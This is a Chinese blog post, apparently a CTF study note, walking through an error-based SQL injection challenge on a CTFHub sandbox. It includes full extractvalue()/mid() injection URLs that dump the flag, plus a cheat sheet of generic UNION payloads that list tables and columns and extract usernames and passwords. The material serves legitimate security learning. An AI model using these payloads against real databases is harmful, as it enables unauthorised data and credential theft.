CTFHub:web前置技能-SQL注入-报错注入

CTFHub个人学习记录

第三章:web前置技能-SQL注入-报错注入



前言

路漫漫其修远兮,吾将上下而求索。
本文涉及以下知识点,去引用文章学习即可:
链接: 我是一个知识点
链接: 我是一个知识点
链接: 我是一个知识点
文章总结有我个人总结的一些知识点,希望对你有所帮助。
练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。


一、解题过程

此题有多种报错解法,我这里图方便使用extractvalue()报错方法做演示:

1.访问靶机,跟提示输入1,结果如下图所示:

在这里插入图片描述

2.查看当前数据库下所有的表,使用limit控制结果数量,发现flag表,如下图所示:

使用命令:

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=1 union select 1,extractvalue(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database()limit 1,1),0x7e))#

在这里插入图片描述

3.查看当前数据表flag下所有的字段,使用limit控制结果数量,发现flag字段,如下图所示:

使用命令:

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name=0x666c6167),0x7e))#

在这里插入图片描述

4.查看flag字段数据信息,发现flag提交即可,如下图所示:

使用命令:

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,(select flag from flag))#

在这里插入图片描述

5.这里可以使用mid函数来截取字段信息,先查看前16个字符信息,如下图所示:

使用命令:

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,concat(0x7e,mid((select flag from flag),1,16),0x7e))#

在这里插入图片描述

6.再查看从17字符开始后的所有字符信息,如下图所示

使用命令:

http://challenge-1b9a7e7411ccb247.sandbox.ctfhub.com:10800/?id=-1 union select 1,extractvalue(1,concat(0x7e,mid((select flag from flag),17),0x7e))#

在这里插入图片描述

7.最后拼接提交flag即可

sql注入基本语句
判断有多少列:

order by 4 -- -

判断数据显示点:

union select 1,2,3 -- -

显示出登录用户和数据库名:

union select 1,user(),database()­­ -- -

­查看数据库有哪些表:

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 -- -

查看对应表有哪些列:

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -

查看账号密码信息:

union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 -- -

总结

思路:
基于报错的SQL盲注 - 报错回显(强制性报错 )
updatexml():从目标XML中更改包含所查询值的字符串
extractvalue():从目标XML中返回包含所查询值的字符串

SQL注入之floor报错原理
floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concant()中的SQL语句或者函数被执行,所以改语句报错而且被抛出的主键是SQL语句或数执行后的结果。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值